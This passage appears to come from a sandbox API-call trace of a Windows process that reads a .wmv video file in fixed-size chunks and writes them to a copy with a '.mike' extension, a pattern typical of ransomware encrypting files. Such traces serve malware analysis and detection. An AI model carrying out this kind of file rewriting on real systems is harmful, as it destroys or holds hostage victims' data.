0x2f3000 [0064.701] ReadFile (in: hFile=0x288, lpBuffer=0x2229d10, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2229d10*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.701] CloseHandle (hObject=0x288) returned 1 [0064.701] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.702] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.702] GetFileType (hFile=0x288) returned 0x1 [0064.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.702] GetFileType (hFile=0x288) returned 0x1 [0064.702] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2f3220 [0064.702] WriteFile (in: hFile=0x288, lpBuffer=0x2234278*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2234278*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.702] CloseHandle (hObject=0x288) returned 1 [0064.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.702] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.703] GetFileType (hFile=0x288) returned 0x1 [0064.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.703] GetFileType (hFile=0x288) returned 0x1 [0064.703] SetFilePointer (in: hFile=0x288, lDistanceToMove=3102720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2f5800 [0064.703] ReadFile (in: hFile=0x288, lpBuffer=0x2236d40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2236d40*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.703] CloseHandle (hObject=0x288) returned 1 [0064.704] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.704] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.704] GetFileType (hFile=0x288) returned 0x1 [0064.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.704] GetFileType (hFile=0x288) returned 0x1 [0064.704] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2f5a20 [0064.704] WriteFile (in: hFile=0x288, lpBuffer=0x22412a8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22412a8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.705] CloseHandle (hObject=0x288) returned 1 [0064.705] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.705] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.705] GetFileType (hFile=0x288) returned 0x1 [0064.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.705] GetFileType (hFile=0x288) returned 0x1 [0064.705] SetFilePointer (in: hFile=0x288, lDistanceToMove=3112960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2f8000 [0064.705] ReadFile (in: hFile=0x288, lpBuffer=0x2243d70, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2243d70*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.706] CloseHandle (hObject=0x288) returned 1 [0064.706] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.706] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.706] GetFileType (hFile=0x288) returned 0x1 [0064.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.706] GetFileType (hFile=0x288) returned 0x1 [0064.707] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2f8220 [0064.707] WriteFile (in: hFile=0x288, lpBuffer=0x224e2d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x224e2d8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.707] CloseHandle (hObject=0x288) returned 1 [0064.707] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.707] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.707] GetFileType (hFile=0x288) returned 0x1 [0064.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.707] GetFileType (hFile=0x288) returned 0x1 [0064.707] SetFilePointer (in: hFile=0x288, lDistanceToMove=3123200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2fa800 [0064.707] ReadFile (in: hFile=0x288, lpBuffer=0x2250da0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2250da0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.708] CloseHandle (hObject=0x288) returned 1 [0064.708] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.708] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.709] GetFileType (hFile=0x288) returned 0x1 [0064.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.709] GetFileType (hFile=0x288) returned 0x1 [0064.709] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2faa20 [0064.709] WriteFile (in: hFile=0x288, lpBuffer=0x225b308*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x225b308*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.709] CloseHandle (hObject=0x288) returned 1 [0064.709] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.709] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.709] GetFileType (hFile=0x288) returned 0x1 [0064.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.710] GetFileType (hFile=0x288) returned 0x1 [0064.710] SetFilePointer (in: hFile=0x288, lDistanceToMove=3133440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2fd000 [0064.710] ReadFile (in: hFile=0x288, lpBuffer=0x225ddd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x225ddd0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.710] CloseHandle (hObject=0x288) returned 1 [0064.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.711] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.711] GetFileType (hFile=0x288) returned 0x1 [0064.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.711] GetFileType (hFile=0x288) returned 0x1 [0064.723] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2fd220 [0064.723] WriteFile (in: hFile=0x288, lpBuffer=0x2268338*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2268338*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.724] CloseHandle (hObject=0x288) returned 1 [0064.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.724] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.724] GetFileType (hFile=0x288) returned 0x1 [0064.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.724] GetFileType (hFile=0x288) returned 0x1 [0064.724] SetFilePointer (in: hFile=0x288, lDistanceToMove=3143680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2ff800 [0064.724] ReadFile (in: hFile=0x288, lpBuffer=0x226ae00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x226ae00*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.728] CloseHandle (hObject=0x288) returned 1 [0064.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.728] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.728] GetFileType (hFile=0x288) returned 0x1 [0064.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.728] GetFileType (hFile=0x288) returned 0x1 [0064.728] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2ffa20 [0064.728] WriteFile (in: hFile=0x288, lpBuffer=0x2275368*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2275368*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.737] CloseHandle (hObject=0x288) returned 1 [0064.737] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.737] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.737] GetFileType (hFile=0x288) returned 0x1 [0064.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.737] GetFileType (hFile=0x288) returned 0x1 [0064.737] SetFilePointer (in: hFile=0x288, lDistanceToMove=3153920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x302000 [0064.738] ReadFile (in: hFile=0x288, lpBuffer=0x2277e30, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2277e30*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.738] CloseHandle (hObject=0x288) returned 1 [0064.738] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.739] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.739] GetFileType (hFile=0x288) returned 0x1 [0064.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.739] GetFileType (hFile=0x288) returned 0x1 [0064.739] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x302220 [0064.739] WriteFile (in: hFile=0x288, lpBuffer=0x2282398*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2282398*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.739] CloseHandle (hObject=0x288) returned 1 [0064.739] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.739] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.740] GetFileType (hFile=0x288) returned 0x1 [0064.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.740] GetFileType (hFile=0x288) returned 0x1 [0064.740] SetFilePointer (in: hFile=0x288, lDistanceToMove=3164160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x304800 [0064.740] ReadFile (in: hFile=0x288, lpBuffer=0x2284e60, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2284e60*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.740] CloseHandle (hObject=0x288) returned 1 [0064.741] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.741] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.741] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.741] GetFileType (hFile=0x288) returned 0x1 [0064.741] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.741] GetFileType (hFile=0x288) returned 0x1 [0064.741] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x304a20 [0064.741] WriteFile (in: hFile=0x288, lpBuffer=0x228f3c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x228f3c8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.742] CloseHandle (hObject=0x288) returned 1 [0064.742] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0064.742] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.742] GetFileType (hFile=0x288) returned 0x1 [0064.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0064.742] GetFileType (hFile=0x288) returned 0x1 [0064.742] SetFilePointer (in: hFile=0x288, lDistanceToMove=3174400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x307000 [0064.742] ReadFile (in: hFile=0x288, lpBuffer=0x2291e90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2291e90*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0064.743] CloseHandle (hObject=0x288) returned 1 [0064.743] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike", lpFilePart=0x0) returned 0x55 [0064.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0064.743] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0064.743] GetFileType (hFile=0x288) returned 0x1 [0064.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0064.743] GetFileType (hFile=0x288) returned 0x1 [0064.743] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x307220 [0064.743] WriteFile (in: hFile=0x288, lpBuffer=0x229c3f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x229c3f8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0064.744] CloseHandle (hObject=0x288) returned 1 [0064.744] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv", lpFilePart=0x0) returned 0x50 [0064.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 